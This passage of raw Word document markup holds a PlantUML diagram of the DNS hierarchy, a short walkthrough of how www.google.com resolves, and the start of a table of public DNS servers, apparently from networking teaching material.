            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    rectangle ".edu\nEducation" as edu_tld</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03B2E316" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    rectangle ".gov\nGovernment" as gov_tld</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00BE6264" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22D14DED" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="52A74E65" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "Second-Level Domains" as slds #lightgreen {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7777611A" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    rectangle "google.com" as google</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39D513E3" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    rectangle "example.com" as example</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E68C59B" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    rectangle "microsoft.com" as microsoft</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5471927D" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    rectangle "wikipedia.org" as wikipedia</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="240DB4AE" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CD946EF" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="768322DA" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "Subdomains" as subdomains #lightyellow {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FDCF1D8" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    rectangle "www.google.com" as www_google</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A36ADA1" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    rectangle "mail.google.com" as mail_google</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EAFE23E" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    rectangle "docs.google.com" as docs_google</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C87159A" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    rectangle "www.example.com" as www_example</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45548DCF" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57D1285F" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0E06AD1D" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  rectangle "Host Records" as hosts #lightpink {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="312BFAE4" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    rectangle "IP: 172.217.14.196" as google_ip</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F44CFFF" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">    rectangle "IP: 93.184.216.34" as example_ip</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DEC5B4E" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t xml:space="preserve">  }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F7787F1" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67A702C3" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0D21E75B" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>root --&gt; com_tld : Delegates .com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68B552D7" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>root --&gt; org_tld : Delegates .org</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F37F892" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>root --&gt; net_tld : Delegates .net</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7147B32E" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="66B1EA1D" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>com_tld --&gt; google : Authoritative\nfor google.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="526F44DC" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>com_tld --&gt; example : Authoritative\nfor example.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11B17C19" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>com_tld --&gt; microsoft : Authoritative\nfor microsoft.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60F28C31" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="53F92E15" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>google --&gt; www_google : Subdomain</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1969C641" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>google --&gt; mail_google : Subdomain</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09E7714D" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>google --&gt; docs_google : Subdomain</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0EF2479B" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>example --&gt; www_example : Subdomain</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FB1B45C" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5F613052" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>www_google --&gt; google_ip : Resolves to</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E87A038" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>www_example --&gt; example_ip : Resolves to</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="241A436F" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1E99D0EB" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>note right of root : 13 root server clusters\nworldwide</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DF087D0" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>note right of tlds : Managed by registries\n(Verisign, PIR, etc.)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F96F221" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>note right of slds : Registered by organizations\nand individuals</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CD3C557" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>note right of subdomains : Managed by domain owner\nfor different services</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23465CEB" w14:textId="77777777" w:rsidR="00A60755" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t>@enduml</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A60755" w14:paraId="774A5399" w14:textId="77777777" w:rsidTr="00C541B7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16218" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64CE42B6" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00456114" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="22" w:lineRule="atLeast"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00456114">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Real-</w:t>
            </w:r>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>world application</w:t>
            </w:r>
            <w:r w:rsidRPr="00456114">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="00456114">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> When you type </w:t>
            </w:r>
            <w:hyperlink r:id="rId13" w:history="1">
              <w:r w:rsidRPr="00456114">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="18"/>
                </w:rPr>
                <w:t>www.google.com</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00456114">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57E23228" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="241"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Root servers direct you to .com servers</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BAB13E8" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="241"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>.com servers direct you to google.com servers</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D2769ED" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="005C524D" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="241"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">google.com servers provide the IP for </w:t>
            </w:r>
            <w:hyperlink r:id="rId14" w:history="1">
              <w:r w:rsidRPr="005C524D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="18"/>
                </w:rPr>
                <w:t>www.google.com</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="3C1756E1" w14:textId="77777777" w:rsidR="00A60755" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="241"/>
              </w:numPr>
            </w:pPr>
            <w:r w:rsidRPr="005C524D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Your browser connects to that IP address 172.217.14.196</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1278" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="666CCEE7" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00A9535E" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7976130F" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00A60755">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Common Public DNS Server</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3348"/>
        <w:gridCol w:w="1736"/>
        <w:gridCol w:w="1858"/>
        <w:gridCol w:w="2420"/>
        <w:gridCol w:w="2420"/>
        <w:gridCol w:w="5714"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A60755" w:rsidRPr="00197245" w14:paraId="6087A291" w14:textId="77777777" w:rsidTr="00C541B7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3348" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41C617AB" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Provider</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1530" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6786C047" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00197245" w:rsidRDefault="00A60755" w:rsidP="00C541B7">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="22" w:lineRule="atLeast"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00197245">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Primary IPv4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
